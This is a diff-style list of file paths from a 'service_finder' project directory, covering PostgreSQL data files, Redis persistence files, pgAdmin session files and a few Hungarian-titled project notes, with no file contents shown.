+/opt/service_finder/postgres_data/base/1/3596 +/opt/service_finder/postgres_data/base/1/2228 +/opt/service_finder/postgres_data/base/1/3605 +/opt/service_finder/postgres_data/base/1/2668 +/opt/service_finder/postgres_data/base/1/4145 +/opt/service_finder/postgres_data/base/1/2602_vm +/opt/service_finder/postgres_data/base/1/2602_fsm +/opt/service_finder/postgres_data/base/1/3079_vm +/opt/service_finder/postgres_data/base/1/4155 +/opt/service_finder/postgres_data/base/1/13476 +/opt/service_finder/postgres_data/base/1/2617_fsm +/opt/service_finder/postgres_data/base/1/2607_vm +/opt/service_finder/postgres_data/base/1/2606 +/opt/service_finder/postgres_data/base/1/2610_fsm +/opt/service_finder/postgres_data/base/1/2831 +/opt/service_finder/postgres_data/base/1/3394_vm +/opt/service_finder/postgres_data/base/1/4147 +/opt/service_finder/postgres_data/base/1/1255 +/opt/service_finder/postgres_data/base/1/2607 +/opt/service_finder/postgres_data/base/1/2611 +/opt/service_finder/postgres_data/base/1/2753_fsm +/opt/service_finder/postgres_data/base/1/2187 +/opt/service_finder/postgres_data/base/1/13465 +/opt/service_finder/postgres_data/base/1/2650 +/opt/service_finder/postgres_data/base/1/3601_vm +/opt/service_finder/postgres_data/base/1/2658 +/opt/service_finder/postgres_data/base/1/2606_vm +/opt/service_finder/postgres_data/base/1/2602 +/opt/service_finder/postgres_data/base/1/2609_fsm +/opt/service_finder/postgres_data/base/1/3607 +/opt/service_finder/postgres_data/base/1/3764_fsm +/opt/service_finder/postgres_data/base/1/4165 +/opt/service_finder/postgres_data/base/1/3764_vm +/opt/service_finder/postgres_data/base/1/4167 +/opt/service_finder/postgres_data/base/1/13457_fsm +/opt/service_finder/postgres_data/base/1/2600_vm +/opt/service_finder/postgres_data/base/1/3350 +/opt/service_finder/postgres_data/base/1/2652 +/opt/service_finder/postgres_data/base/1/3118 +/opt/service_finder/postgres_data/base/1/3603_vm +/opt/service_finder/postgres_data/base/1/2704 +/opt/service_finder/postgres_data/base/1/2328 +/opt/service_finder/postgres_data/base/1/6237 +/opt/service_finder/postgres_data/base/1/4150 +/opt/service_finder/postgres_data/base/1/3606 +/opt/service_finder/postgres_data/base/1/1259_fsm +/opt/service_finder/postgres_data/base/1/2675 +/opt/service_finder/postgres_data/base/1/3598 +/opt/service_finder/postgres_data/base/1/6110 +/opt/service_finder/postgres_data/base/1/113 +/opt/service_finder/postgres_data/base/1/1247_fsm +/opt/service_finder/postgres_data/base/1/2682 +/opt/service_finder/postgres_data/base/1/13471 +/opt/service_finder/postgres_data/base/1/3608 +/opt/service_finder/postgres_data/base/1/4173 +/opt/service_finder/postgres_data/base/1/2679 +/opt/service_finder/postgres_data/base/1/3379 +/opt/service_finder/postgres_data/base/1/2616 +/opt/service_finder/postgres_data/base/1/2839 +/opt/service_finder/postgres_data/base/1/3764 +/opt/service_finder/postgres_data/base/1/2661 +/opt/service_finder/postgres_data/base/1/2835 +/opt/service_finder/postgres_data/base/1/2619 +/opt/service_finder/postgres_data/base/1/2608_fsm +/opt/service_finder/postgres_data/base/1/2655 +/opt/service_finder/postgres_data/base/1/3766 +/opt/service_finder/postgres_data/base/1/13470 +/opt/service_finder/postgres_data/base/1/3394 +/opt/service_finder/postgres_data/base/1/3080 +/opt/service_finder/postgres_data/base/1/2619_fsm +/opt/service_finder/postgres_data/base/1/3541_vm +/opt/service_finder/postgres_data/base/1/4164 +/opt/service_finder/postgres_data/base/1/3502 +/opt/service_finder/postgres_data/base/1/4159 +/opt/service_finder/postgres_data/base/1/2613 +/opt/service_finder/postgres_data/base/1/4153 +/opt/service_finder/postgres_data/base/1/13467_fsm +/opt/service_finder/postgres_data/base/1/6112 +/opt/service_finder/postgres_data/base/1/3456_vm +/opt/service_finder/postgres_data/base/1/2616_fsm +/opt/service_finder/postgres_data/base/1/2224 +/opt/service_finder/postgres_data/base/1/2603 +/opt/service_finder/postgres_data/base/1/2665 +/opt/service_finder/postgres_data/base/1/2755 +/opt/service_finder/postgres_data/base/1/3604 +/opt/service_finder/postgres_data/base/1/2609 +/opt/service_finder/postgres_data/base/1/2659 +/opt/service_finder/postgres_data/base/1/2612 +/opt/service_finder/postgres_data/base/1/13466 +/opt/service_finder/postgres_data/base/1/2690 +/opt/service_finder/postgres_data/base/1/2838 +/opt/service_finder/postgres_data/base/1/1249 +/opt/service_finder/postgres_data/base/1/3429 +/opt/service_finder/postgres_data/base/1/828 +/opt/service_finder/postgres_data/base/1/3599 +/opt/service_finder/postgres_data/base/1/2680 +/opt/service_finder/postgres_data/base/1/3534 +/opt/service_finder/postgres_data/base/1/2836_vm +/opt/service_finder/postgres_data/base/1/2618 +/opt/service_finder/postgres_data/base/1/2840_vm +/opt/service_finder/postgres_data/base/1/2654 +/opt/service_finder/postgres_data/base/1/4166 +/opt/service_finder/postgres_data/base/1/2600_fsm +/opt/service_finder/postgres_data/base/1/2841 +/opt/service_finder/postgres_data/base/1/2617_vm +/opt/service_finder/postgres_data/base/1/2996 +/opt/service_finder/postgres_data/base/1/3433 +/opt/service_finder/postgres_data/base/1/2684 +/opt/service_finder/postgres_data/base/1/3603_fsm +/opt/service_finder/postgres_data/base/1/1247_vm +/opt/service_finder/postgres_data/base/1/3394_fsm +/opt/service_finder/postgres_data/base/1/6175 +/opt/service_finder/postgres_data/base/1/2834 +/opt/service_finder/postgres_data/base/1/3609 +/opt/service_finder/postgres_data/base/1/2692 +/opt/service_finder/postgres_data/base/1/13462_vm +/opt/service_finder/postgres_data/base/1/3600_fsm +/opt/service_finder/postgres_data/base/1/2701 +/opt/service_finder/postgres_data/base/1/4160 +/opt/service_finder/postgres_data/base/1/4146 +/opt/service_finder/postgres_data/base/1/1418 +/opt/service_finder/postgres_data/base/1/6116 +/opt/service_finder/postgres_data/base/1/6104 +/opt/service_finder/postgres_data/base/1/1247 +/opt/service_finder/postgres_data/base/1/2651 +/opt/service_finder/postgres_data/base/1/3456_fsm +/opt/service_finder/postgres_data/base/1/2616_vm +/opt/service_finder/postgres_data/base/1/4156 +/opt/service_finder/postgres_data/base/1/4169 +/opt/service_finder/postgres_data/base/1/2833 +/opt/service_finder/postgres_data/base/1/2836 +/opt/service_finder/postgres_data/base/1/4151 +/opt/service_finder/postgres_data/base/1/174 +/opt/service_finder/postgres_data/base/1/6111 +/opt/service_finder/postgres_data/base/1/3602_fsm +/opt/service_finder/postgres_data/base/1/2618_vm +/opt/service_finder/postgres_data/base/1/2678 +/opt/service_finder/postgres_data/base/1/2683 +/opt/service_finder/postgres_data/base/1/2656 +/opt/service_finder/postgres_data/base/1/2667 +/opt/service_finder/postgres_data/base/1/3119 +/opt/service_finder/postgres_data/base/1/2600 +/opt/service_finder/postgres_data/base/1/2620 +/opt/service_finder/postgres_data/base/1/2753 +/opt/service_finder/postgres_data/base/1/13457 +/opt/service_finder/postgres_data/base/1/112 +/opt/service_finder/postgres_data/base/1/2608_vm +/opt/service_finder/postgres_data/base/1/3575 +/opt/service_finder/postgres_data/base/1/3767 +/opt/service_finder/postgres_data/base/1/6113 +/opt/service_finder/postgres_data/base/1/3542 +/opt/service_finder/postgres_data/base/1/1259 +/opt/service_finder/postgres_data/base/1/2604 +/opt/service_finder/postgres_data/base/1/13461 +/opt/service_finder/postgres_data/base/1/2840 +/opt/service_finder/postgres_data/base/1/3601 +/opt/service_finder/postgres_data/base/1/2605_vm +/opt/service_finder/postgres_data/base/1/2606_fsm +/opt/service_finder/postgres_data/base/1/2830 +/opt/service_finder/postgres_data/base/1/6239 +/opt/service_finder/postgres_data/base/1/3430 +/opt/service_finder/postgres_data/base/1/2607_fsm +/opt/service_finder/postgres_data/base/1/2617 +/opt/service_finder/postgres_data/base/1/2702 +/opt/service_finder/postgres_data/base/1/4174 +/opt/service_finder/postgres_data/base/1/6106 +/opt/service_finder/postgres_data/base/1/2681 +/opt/service_finder/postgres_data/base/1/6238 +/opt/service_finder/postgres_data/base/1/2610_vm +/opt/service_finder/postgres_data/base/1/2838_fsm +/opt/service_finder/postgres_data/base/1/4172 +/opt/service_finder/postgres_data/base/1/175 +/opt/service_finder/postgres_data/base/1/3541 +/opt/service_finder/postgres_data/base/1/2832 +/opt/service_finder/postgres_data/base/1/2601_fsm +/opt/service_finder/postgres_data/base/1/13462 +/opt/service_finder/postgres_data/base/1/4170 +/opt/service_finder/postgres_data/base/1/3603 +/opt/service_finder/postgres_data/base/1/2610 +/opt/service_finder/postgres_data/base/1/2670 +/opt/service_finder/postgres_data/base/1/1249_vm +/opt/service_finder/postgres_data/base/1/2601 +/opt/service_finder/postgres_data/base/1/2605_fsm +/opt/service_finder/postgres_data/base/1/3081 +/opt/service_finder/postgres_data/base/1/4154 +/opt/service_finder/postgres_data/base/1/3456 +/opt/service_finder/postgres_data/base/1/2603_fsm +/opt/service_finder/postgres_data/base/1/2687 +/opt/service_finder/postgres_data/base/1/2608 +/opt/service_finder/postgres_data/base/1/2664 +/opt/service_finder/postgres_data/base/1/2840_fsm +/opt/service_finder/postgres_data/base/1/3576 +/opt/service_finder/postgres_data/base/4 +/opt/service_finder/postgres_data/base/4/3079_fsm +/opt/service_finder/postgres_data/base/4/4143 +/opt/service_finder/postgres_data/base/4/3455 +/opt/service_finder/postgres_data/base/4/2686 +/opt/service_finder/postgres_data/base/4/pg_filenode.map +/opt/service_finder/postgres_data/base/4/3602_vm +/opt/service_finder/postgres_data/base/4/1255_vm +/opt/service_finder/postgres_data/base/4/2601_vm +/opt/service_finder/postgres_data/base/4/2838_vm +/opt/service_finder/postgres_data/base/4/2836_fsm +/opt/service_finder/postgres_data/base/4/3164 +/opt/service_finder/postgres_data/base/4/13467_vm +/opt/service_finder/postgres_data/base/4/3351 +/opt/service_finder/postgres_data/base/4/3600_vm +/opt/service_finder/postgres_data/base/4/5002 +/opt/service_finder/postgres_data/base/4/1255_fsm +/opt/service_finder/postgres_data/base/4/3380 +/opt/service_finder/postgres_data/base/4/3381 +/opt/service_finder/postgres_data/base/4/2663 +/opt/service_finder/postgres_data/base/4/3601_fsm +/opt/service_finder/postgres_data/base/4/13472_fsm +/opt/service_finder/postgres_data/base/4/4148 +/opt/service_finder/postgres_data/base/4/2618_fsm +/opt/service_finder/postgres_data/base/4/3440 +/opt/service_finder/postgres_data/base/4/2619_vm +/opt/service_finder/postgres_data/base/4/3467 +/opt/service_finder/postgres_data/base/4/2688 +/opt/service_finder/postgres_data/base/4/3997 +/opt/service_finder/postgres_data/base/4/2662 +/opt/service_finder/postgres_data/base/4/6229 +/opt/service_finder/postgres_data/base/4/3439 +/opt/service_finder/postgres_data/base/4/13472_vm +/opt/service_finder/postgres_data/base/4/2657 +/opt/service_finder/postgres_data/base/4/2609_vm +/opt/service_finder/postgres_data/base/4/4157 +/opt/service_finder/postgres_data/base/4/3257 +/opt/service_finder/postgres_data/base/4/3503 +/opt/service_finder/postgres_data/base/4/3541_fsm +/opt/service_finder/postgres_data/base/4/2756 +/opt/service_finder/postgres_data/base/4/2615_vm +/opt/service_finder/postgres_data/base/4/1259_vm +/opt/service_finder/postgres_data/base/4/3256 +/opt/service_finder/postgres_data/base/4/2615_fsm +/opt/service_finder/postgres_data/base/4/2703 +/opt/service_finder/postgres_data/base/4/2753_vm +/opt/service_finder/postgres_data/base/4/2603_vm +/opt/service_finder/postgres_data/base/4/1249_fsm +/opt/service_finder/postgres_data/base/4/13460 +/opt/service_finder/postgres_data/base/4/3600 +/opt/service_finder/postgres_data/base/4/13457_vm +/opt/service_finder/postgres_data/base/4/2653 +/opt/service_finder/postgres_data/base/4/2337 +/opt/service_finder/postgres_data/base/4/13462_fsm +/opt/service_finder/postgres_data/base/4/3085 +/opt/service_finder/postgres_data/base/4/2995 +/opt/service_finder/postgres_data/base/4/2336 +/opt/service_finder/postgres_data/base/4/2612_fsm +/opt/service_finder/postgres_data/base/4/3258 +/opt/service_finder/postgres_data/base/4/3466 +/opt/service_finder/postgres_data/base/4/3079 +/opt/service_finder/postgres_data/base/4/4144 +/opt/service_finder/postgres_data/base/4/1417 +/opt/service_finder/postgres_data/base/4/13472 +/opt/service_finder/postgres_data/base/4/2666 +/opt/service_finder/postgres_data/base/4/13467 +/opt/service_finder/postgres_data/base/4/6228 +/opt/service_finder/postgres_data/base/4/6117 +/opt/service_finder/postgres_data/base/4/2757 +/opt/service_finder/postgres_data/base/4/2685 +/opt/service_finder/postgres_data/base/4/2612_vm +/opt/service_finder/postgres_data/base/4/2615 +/opt/service_finder/postgres_data/base/4/3501 +/opt/service_finder/postgres_data/base/4/3602 +/opt/service_finder/postgres_data/base/4/6176 +/opt/service_finder/postgres_data/base/4/2605 +/opt/service_finder/postgres_data/base/4/2674 +/opt/service_finder/postgres_data/base/4/2754 +/opt/service_finder/postgres_data/base/4/549 +/opt/service_finder/postgres_data/base/4/3712 +/opt/service_finder/postgres_data/base/4/2669 +/opt/service_finder/postgres_data/base/4/2689 +/opt/service_finder/postgres_data/base/4/4152 +/opt/service_finder/postgres_data/base/4/3395 +/opt/service_finder/postgres_data/base/4/2693 +/opt/service_finder/postgres_data/base/4/13475 +/opt/service_finder/postgres_data/base/4/4149 +/opt/service_finder/postgres_data/base/4/548 +/opt/service_finder/postgres_data/base/4/2699 +/opt/service_finder/postgres_data/base/4/2673 +/opt/service_finder/postgres_data/base/4/3431 +/opt/service_finder/postgres_data/base/4/3574 +/opt/service_finder/postgres_data/base/4/3468 +/opt/service_finder/postgres_data/base/4/4171 +/opt/service_finder/postgres_data/base/4/4163 +/opt/service_finder/postgres_data/base/4/2696 +/opt/service_finder/postgres_data/base/4/4168 +/opt/service_finder/postgres_data/base/4/6102 +/opt/service_finder/postgres_data/base/4/3597 +/opt/service_finder/postgres_data/base/4/PG_VERSION +/opt/service_finder/postgres_data/base/4/2837 +/opt/service_finder/postgres_data/base/4/2579 +/opt/service_finder/postgres_data/base/4/827 +/opt/service_finder/postgres_data/base/4/4158 +/opt/service_finder/postgres_data/base/4/2691 +/opt/service_finder/postgres_data/base/4/826 +/opt/service_finder/postgres_data/base/4/2660 +/opt/service_finder/postgres_data/base/4/3596 +/opt/service_finder/postgres_data/base/4/2228 +/opt/service_finder/postgres_data/base/4/3605 +/opt/service_finder/postgres_data/base/4/2668 +/opt/service_finder/postgres_data/base/4/4145 +/opt/service_finder/postgres_data/base/4/2602_vm +/opt/service_finder/postgres_data/base/4/2602_fsm +/opt/service_finder/postgres_data/base/4/3079_vm +/opt/service_finder/postgres_data/base/4/4155 +/opt/service_finder/postgres_data/base/4/13476 +/opt/service_finder/postgres_data/base/4/2617_fsm +/opt/service_finder/postgres_data/base/4/2607_vm +/opt/service_finder/postgres_data/base/4/2606 +/opt/service_finder/postgres_data/base/4/2610_fsm +/opt/service_finder/postgres_data/base/4/2831 +/opt/service_finder/postgres_data/base/4/3394_vm +/opt/service_finder/postgres_data/base/4/4147 +/opt/service_finder/postgres_data/base/4/1255 +/opt/service_finder/postgres_data/base/4/2607 +/opt/service_finder/postgres_data/base/4/2611 +/opt/service_finder/postgres_data/base/4/2753_fsm +/opt/service_finder/postgres_data/base/4/2187 +/opt/service_finder/postgres_data/base/4/13465 +/opt/service_finder/postgres_data/base/4/2650 +/opt/service_finder/postgres_data/base/4/3601_vm +/opt/service_finder/postgres_data/base/4/2658 +/opt/service_finder/postgres_data/base/4/2606_vm +/opt/service_finder/postgres_data/base/4/2602 +/opt/service_finder/postgres_data/base/4/2609_fsm +/opt/service_finder/postgres_data/base/4/3607 +/opt/service_finder/postgres_data/base/4/3764_fsm +/opt/service_finder/postgres_data/base/4/4165 +/opt/service_finder/postgres_data/base/4/3764_vm +/opt/service_finder/postgres_data/base/4/4167 +/opt/service_finder/postgres_data/base/4/13457_fsm +/opt/service_finder/postgres_data/base/4/2600_vm +/opt/service_finder/postgres_data/base/4/3350 +/opt/service_finder/postgres_data/base/4/2652 +/opt/service_finder/postgres_data/base/4/3118 +/opt/service_finder/postgres_data/base/4/3603_vm +/opt/service_finder/postgres_data/base/4/2704 +/opt/service_finder/postgres_data/base/4/2328 +/opt/service_finder/postgres_data/base/4/6237 +/opt/service_finder/postgres_data/base/4/4150 +/opt/service_finder/postgres_data/base/4/3606 +/opt/service_finder/postgres_data/base/4/1259_fsm +/opt/service_finder/postgres_data/base/4/2675 +/opt/service_finder/postgres_data/base/4/3598 +/opt/service_finder/postgres_data/base/4/6110 +/opt/service_finder/postgres_data/base/4/113 +/opt/service_finder/postgres_data/base/4/1247_fsm +/opt/service_finder/postgres_data/base/4/2682 +/opt/service_finder/postgres_data/base/4/13471 +/opt/service_finder/postgres_data/base/4/3608 +/opt/service_finder/postgres_data/base/4/4173 +/opt/service_finder/postgres_data/base/4/2679 +/opt/service_finder/postgres_data/base/4/3379 +/opt/service_finder/postgres_data/base/4/2616 +/opt/service_finder/postgres_data/base/4/2839 +/opt/service_finder/postgres_data/base/4/3764 +/opt/service_finder/postgres_data/base/4/2661 +/opt/service_finder/postgres_data/base/4/2835 +/opt/service_finder/postgres_data/base/4/2619 +/opt/service_finder/postgres_data/base/4/2608_fsm +/opt/service_finder/postgres_data/base/4/2655 +/opt/service_finder/postgres_data/base/4/3766 +/opt/service_finder/postgres_data/base/4/13470 +/opt/service_finder/postgres_data/base/4/3394 +/opt/service_finder/postgres_data/base/4/3080 +/opt/service_finder/postgres_data/base/4/2619_fsm +/opt/service_finder/postgres_data/base/4/3541_vm +/opt/service_finder/postgres_data/base/4/4164 +/opt/service_finder/postgres_data/base/4/3502 +/opt/service_finder/postgres_data/base/4/4159 +/opt/service_finder/postgres_data/base/4/2613 +/opt/service_finder/postgres_data/base/4/4153 +/opt/service_finder/postgres_data/base/4/13467_fsm +/opt/service_finder/postgres_data/base/4/6112 +/opt/service_finder/postgres_data/base/4/3456_vm +/opt/service_finder/postgres_data/base/4/2616_fsm +/opt/service_finder/postgres_data/base/4/2224 +/opt/service_finder/postgres_data/base/4/2603 +/opt/service_finder/postgres_data/base/4/2665 +/opt/service_finder/postgres_data/base/4/2755 +/opt/service_finder/postgres_data/base/4/3604 +/opt/service_finder/postgres_data/base/4/2609 +/opt/service_finder/postgres_data/base/4/2659 +/opt/service_finder/postgres_data/base/4/2612 +/opt/service_finder/postgres_data/base/4/13466 +/opt/service_finder/postgres_data/base/4/2690 +/opt/service_finder/postgres_data/base/4/2838 +/opt/service_finder/postgres_data/base/4/1249 +/opt/service_finder/postgres_data/base/4/3429 +/opt/service_finder/postgres_data/base/4/828 +/opt/service_finder/postgres_data/base/4/3599 +/opt/service_finder/postgres_data/base/4/2680 +/opt/service_finder/postgres_data/base/4/3534 +/opt/service_finder/postgres_data/base/4/2836_vm +/opt/service_finder/postgres_data/base/4/2618 +/opt/service_finder/postgres_data/base/4/2840_vm +/opt/service_finder/postgres_data/base/4/2654 +/opt/service_finder/postgres_data/base/4/4166 +/opt/service_finder/postgres_data/base/4/2600_fsm +/opt/service_finder/postgres_data/base/4/2841 +/opt/service_finder/postgres_data/base/4/2617_vm +/opt/service_finder/postgres_data/base/4/2996 +/opt/service_finder/postgres_data/base/4/3433 +/opt/service_finder/postgres_data/base/4/2684 +/opt/service_finder/postgres_data/base/4/3603_fsm +/opt/service_finder/postgres_data/base/4/1247_vm +/opt/service_finder/postgres_data/base/4/3394_fsm +/opt/service_finder/postgres_data/base/4/6175 +/opt/service_finder/postgres_data/base/4/2834 +/opt/service_finder/postgres_data/base/4/3609 +/opt/service_finder/postgres_data/base/4/2692 +/opt/service_finder/postgres_data/base/4/13462_vm +/opt/service_finder/postgres_data/base/4/3600_fsm +/opt/service_finder/postgres_data/base/4/2701 +/opt/service_finder/postgres_data/base/4/4160 +/opt/service_finder/postgres_data/base/4/4146 +/opt/service_finder/postgres_data/base/4/1418 +/opt/service_finder/postgres_data/base/4/6116 +/opt/service_finder/postgres_data/base/4/6104 +/opt/service_finder/postgres_data/base/4/1247 +/opt/service_finder/postgres_data/base/4/2651 +/opt/service_finder/postgres_data/base/4/3456_fsm +/opt/service_finder/postgres_data/base/4/2616_vm +/opt/service_finder/postgres_data/base/4/4156 +/opt/service_finder/postgres_data/base/4/4169 +/opt/service_finder/postgres_data/base/4/2833 +/opt/service_finder/postgres_data/base/4/2836 +/opt/service_finder/postgres_data/base/4/4151 +/opt/service_finder/postgres_data/base/4/174 +/opt/service_finder/postgres_data/base/4/6111 +/opt/service_finder/postgres_data/base/4/3602_fsm +/opt/service_finder/postgres_data/base/4/2618_vm +/opt/service_finder/postgres_data/base/4/2678 +/opt/service_finder/postgres_data/base/4/2683 +/opt/service_finder/postgres_data/base/4/2656 +/opt/service_finder/postgres_data/base/4/2667 +/opt/service_finder/postgres_data/base/4/3119 +/opt/service_finder/postgres_data/base/4/2600 +/opt/service_finder/postgres_data/base/4/2620 +/opt/service_finder/postgres_data/base/4/2753 +/opt/service_finder/postgres_data/base/4/13457 +/opt/service_finder/postgres_data/base/4/112 +/opt/service_finder/postgres_data/base/4/2608_vm +/opt/service_finder/postgres_data/base/4/3575 +/opt/service_finder/postgres_data/base/4/3767 +/opt/service_finder/postgres_data/base/4/6113 +/opt/service_finder/postgres_data/base/4/3542 +/opt/service_finder/postgres_data/base/4/1259 +/opt/service_finder/postgres_data/base/4/2604 +/opt/service_finder/postgres_data/base/4/13461 +/opt/service_finder/postgres_data/base/4/2840 +/opt/service_finder/postgres_data/base/4/3601 +/opt/service_finder/postgres_data/base/4/2605_vm +/opt/service_finder/postgres_data/base/4/2606_fsm +/opt/service_finder/postgres_data/base/4/2830 +/opt/service_finder/postgres_data/base/4/6239 +/opt/service_finder/postgres_data/base/4/3430 +/opt/service_finder/postgres_data/base/4/2607_fsm +/opt/service_finder/postgres_data/base/4/2617 +/opt/service_finder/postgres_data/base/4/2702 +/opt/service_finder/postgres_data/base/4/4174 +/opt/service_finder/postgres_data/base/4/6106 +/opt/service_finder/postgres_data/base/4/2681 +/opt/service_finder/postgres_data/base/4/6238 +/opt/service_finder/postgres_data/base/4/2610_vm +/opt/service_finder/postgres_data/base/4/2838_fsm +/opt/service_finder/postgres_data/base/4/4172 +/opt/service_finder/postgres_data/base/4/175 +/opt/service_finder/postgres_data/base/4/3541 +/opt/service_finder/postgres_data/base/4/2832 +/opt/service_finder/postgres_data/base/4/2601_fsm +/opt/service_finder/postgres_data/base/4/13462 +/opt/service_finder/postgres_data/base/4/4170 +/opt/service_finder/postgres_data/base/4/3603 +/opt/service_finder/postgres_data/base/4/2610 +/opt/service_finder/postgres_data/base/4/2670 +/opt/service_finder/postgres_data/base/4/1249_vm +/opt/service_finder/postgres_data/base/4/2601 +/opt/service_finder/postgres_data/base/4/2605_fsm +/opt/service_finder/postgres_data/base/4/3081 +/opt/service_finder/postgres_data/base/4/4154 +/opt/service_finder/postgres_data/base/4/3456 +/opt/service_finder/postgres_data/base/4/2603_fsm +/opt/service_finder/postgres_data/base/4/2687 +/opt/service_finder/postgres_data/base/4/2608 +/opt/service_finder/postgres_data/base/4/2664 +/opt/service_finder/postgres_data/base/4/2840_fsm +/opt/service_finder/postgres_data/base/4/3576 +/opt/service_finder/postgres_data/pg_hba.conf +/opt/service_finder/postgres_data/pg_dynshmem +/opt/service_finder/postgres_data/pg_xact +/opt/service_finder/postgres_data/pg_xact/0000 +/opt/service_finder/postgres_data/postgresql.auto.conf +/opt/service_finder/postgres_data/pg_stat +/opt/service_finder/postgres_data/PG_VERSION +/opt/service_finder/postgres_data/pg_stat_tmp +/opt/service_finder/postgres_data/pg_subtrans +/opt/service_finder/postgres_data/pg_subtrans/0000 +/opt/service_finder/postgres_data/pg_ident.conf +/opt/service_finder/postgres_data/pg_snapshots +/opt/service_finder/postgres_data/global +/opt/service_finder/postgres_data/global/1232 +/opt/service_finder/postgres_data/global/pg_filenode.map +/opt/service_finder/postgres_data/global/6001 +/opt/service_finder/postgres_data/global/1260_vm +/opt/service_finder/postgres_data/global/2677 +/opt/service_finder/postgres_data/global/2847 +/opt/service_finder/postgres_data/global/1262 +/opt/service_finder/postgres_data/global/3592 +/opt/service_finder/postgres_data/global/4177 +/opt/service_finder/postgres_data/global/3593 +/opt/service_finder/postgres_data/global/4185 +/opt/service_finder/postgres_data/global/2676 +/opt/service_finder/postgres_data/global/2396 +/opt/service_finder/postgres_data/global/1261_vm +/opt/service_finder/postgres_data/global/2671 +/opt/service_finder/postgres_data/global/6243 +/opt/service_finder/postgres_data/global/pg_internal.init +/opt/service_finder/postgres_data/global/2964 +/opt/service_finder/postgres_data/global/4182 +/opt/service_finder/postgres_data/global/1260_fsm +/opt/service_finder/postgres_data/global/4181 +/opt/service_finder/postgres_data/global/4178 +/opt/service_finder/postgres_data/global/1213_fsm +/opt/service_finder/postgres_data/global/4175 +/opt/service_finder/postgres_data/global/1261 +/opt/service_finder/postgres_data/global/2695 +/opt/service_finder/postgres_data/global/1233 +/opt/service_finder/postgres_data/global/4186 +/opt/service_finder/postgres_data/global/4183 +/opt/service_finder/postgres_data/global/2396_fsm +/opt/service_finder/postgres_data/global/4061 +/opt/service_finder/postgres_data/global/2694 +/opt/service_finder/postgres_data/global/6000 +/opt/service_finder/postgres_data/global/4184 +/opt/service_finder/postgres_data/global/1260 +/opt/service_finder/postgres_data/global/pg_control +/opt/service_finder/postgres_data/global/2967 +/opt/service_finder/postgres_data/global/6100 +/opt/service_finder/postgres_data/global/1262_vm +/opt/service_finder/postgres_data/global/2397 +/opt/service_finder/postgres_data/global/6244 +/opt/service_finder/postgres_data/global/6246 +/opt/service_finder/postgres_data/global/6002 +/opt/service_finder/postgres_data/global/1262_fsm +/opt/service_finder/postgres_data/global/4176 +/opt/service_finder/postgres_data/global/6114 +/opt/service_finder/postgres_data/global/6245 +/opt/service_finder/postgres_data/global/2672 +/opt/service_finder/postgres_data/global/1261_fsm +/opt/service_finder/postgres_data/global/4060 +/opt/service_finder/postgres_data/global/2966 +/opt/service_finder/postgres_data/global/6247 +/opt/service_finder/postgres_data/global/2846 +/opt/service_finder/postgres_data/global/1213_vm +/opt/service_finder/postgres_data/global/6115 +/opt/service_finder/postgres_data/global/2396_vm +/opt/service_finder/postgres_data/global/2698 +/opt/service_finder/postgres_data/global/2697 +/opt/service_finder/postgres_data/global/2965 +/opt/service_finder/postgres_data/global/1214 +/opt/service_finder/postgres_data/global/1213 +/opt/service_finder/postgres_data/pg_serial +/opt/service_finder/postgres_data/pg_replslot +/opt/service_finder/postgres_data/pg_tblspc +/opt/service_finder/postgres_data/pg_multixact +/opt/service_finder/postgres_data/pg_multixact/members +/opt/service_finder/postgres_data/pg_multixact/members/0000 +/opt/service_finder/postgres_data/pg_multixact/offsets +/opt/service_finder/postgres_data/pg_multixact/offsets/0000 +/opt/service_finder/postgres_data/pg_twophase +/opt/service_finder/postgres_data/pg_notify +/opt/service_finder/postgres_data/postgresql.conf +/opt/service_finder/postgres_data/pg_wal +/opt/service_finder/postgres_data/pg_wal/000000010000000000000004 +/opt/service_finder/postgres_data/pg_wal/archive_status +/opt/service_finder/postgres_data/pg_wal/000000010000000000000003 +/opt/service_finder/postgres_data/postmaster.opts +/opt/service_finder/postgres_data/postmaster.pid +/opt/service_finder/_Projekt Állapot jelentés.txt +/opt/service_finder/_valtozok_konyve.txt +/opt/service_finder/redis +/opt/service_finder/redis/data +/opt/service_finder/redis/data/appendonlydir +/opt/service_finder/redis/data/appendonlydir/appendonly.aof.1.incr.aof +/opt/service_finder/redis/data/appendonlydir/appendonly.aof.manifest +/opt/service_finder/redis/data/appendonlydir/appendonly.aof.1.base.rdb +/opt/service_finder/redis/data/dump.rdb +/opt/service_finder/Service_finder Rendszerspecifikáció es feljesztes.txt +/opt/service_finder/Promptok gemekhez.txt +/opt/service_finder/pgadmin_data +/opt/service_finder/pgadmin_data/sessions +/opt/service_finder/pgadmin_data/sessions/7e296dbd-1a8a-4ee7-9d2b-d58fe252f075 +/opt/service_finder/pgadmin_data/sessions/c666f005-bd12-4473-afc5-a29c62bf415d +/opt/service_finder/pgadmin_data/sessions/85b5337d-d8f2-4b71-b137-064d2e58ac71 +/opt/service_finder/pgadmin_data/sessions/531a8bc6-f244-413e-8871-ad91726f2c07 +/opt/service_finder/pgadmin_data/sessions/07db1ecc-c3fa-40ab-a083-12e85dcce468 +/opt/service_finder/pgadmin_data/sessions/8cf0580d-952f-4493-89c3-85c67e055c65 +/opt/service_finder/pgadmin_data/sessions/330aa8d0-b9e3-4358-ad44-2e2652be0368 +/opt/service_finder/pgadmin_data/sessions/5bfd65ca-5f1c-4ddc-bbcd-11eb357ac79a +/opt/service_finder/pgadmin_data/sessions/6efddea4-0fff-4ba4-88de-7e7f59829a07 +/opt/service_finder/pgadmin_data/sessions/d9687357-482d-4e98-a5c2-7e2b703a81f4 +/opt/service_finder/pgadmin_data/sessions/d8167c73-8c62-4a58-a955-793bca662153 +/opt/service_finder/pgadmin_data/sessions/c05ee10a-1093-4927-98d9-b695682f8bf5 +/opt/service_finder/pgadmin_data/sessions/6b81cca5-ecc5-4102-b789-5e90c669b23c +/opt/service_finder/pgadmin_data/sessions/6ac4ae19-3062-4f40-85fb-14eef4316770 +/opt/service_finder/pgadmin_data/sessions/782736b8-f6e0-44a4-881a-947fff399f36 +/opt/service_finder/pgadmin_data/sessions/f3274d22-c918-4c15-9235-38f09a0984e9 +/opt/service_finder/pgadmin_data/sessions/b38560bd-b66e-451b-8d78-2f36cfc1f25c +/opt/service_finder/pgadmin_data/sessions/e9740d39-d498-43c2-b2aa-5242ec394e5c +/opt/service_finder/pgadmin_data/sessions/6a28c89f-7ae0-4c51-b84f-16a526b0adbe +/opt/service_finder/pgadmin_data/sessions/6829177c-2838-4686-8d7f-3659b50ecdf1 +/opt/service_finder/pgadmin_data/sessions/4613daf5-a479-4334-bec9-3a1242c0aff8 